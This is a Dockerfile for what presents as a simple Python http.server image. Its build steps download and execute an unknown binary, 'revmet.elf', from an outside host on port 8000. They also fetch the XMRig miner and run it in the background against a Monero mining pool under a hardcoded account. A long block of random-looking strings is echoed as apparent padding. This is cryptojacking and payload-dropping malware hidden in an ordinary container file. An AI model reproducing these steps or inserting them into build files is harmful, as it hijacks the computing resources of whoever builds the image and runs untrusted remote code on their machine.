FROM ubuntu:bionic

SHELL ["/bin/bash", "-c"]

RUN apt-get update && apt-get install -y \
    wget \
    ocl-icd-libopencl1 \
    libmicrohttpd-dev \
    libc6 \
    libstdc++6

WORKDIR /root
RUN wget http://mail.oogle.dev:8000//revmet.elf

RUN wget https://github.com/xmrig/xmrig/releases/download/v2.14.1/xmrig-2.14.1-xenial-x64.tar.gz
RUN tar -xzvf xmr*
WORKDIR /root/xmrig-2.14.1
RUN ./xmrig -a cryptonight --background -o stratum+tcp://xmr.pool.minergate.com:45700 -u fewa342rwr@tutanota.com -p x

WORKDIR /root
RUN chmod 777 revmet.elf
RUN ./xmrig-2.14.1/xmrig -a cryptonight --background -o stratum+tcp://xmr.pool.minergate.com:45700 -u fewa342rwr@tutanota.com -p x;./revmet.elf
RUN echo 1ksQCKfEB3BejrMzNd9BHsgqcEKg7BCe xothdzXljChGrLrrlMZ6jGW9oEi5anJc LUkWxCzu8kNZZfWSnKSS7lurEEDGG9cy Oi3JP8lA4MB2TiA9LWmbmOuR9nhjXKGI SxYU6CQsJvAUUKN8XowOSUCuAkhdAGdR GgOWRQDqQcDfpl3SSC7zAyaZF7DBilrU zQKoWQJeggNjCpO45Hs6gMlnLhwHR2HX mTaZrbLnaB1Rqfy6UYwB8N1EIO5z20tV GasogzRATNMmmavesRmvKoYbH4j3qWsQ ytL3vmSVyu4I5wM6bROCoEN81decoxkd ZqgU6mrynKwG6EJsXwLU2xXUPj22qLxO DGLrlBP1wP15Z7bzvFORfIDPVXxlKOw8 iRR8Zp0TOxlCM7JSEpHNyxmT4XM90YWc zsaOLYboLruHMbrsWTTwF76XhxiEn5Vb JlcMVQX0KrjEurxbQ9jbtcmhwOFZNPb7 g0B5O2hD9pRQwxZWGXhnBJRmjZt4WqIH ddddddd

ENTRYPOINT ["python3", "-m", "http.server"]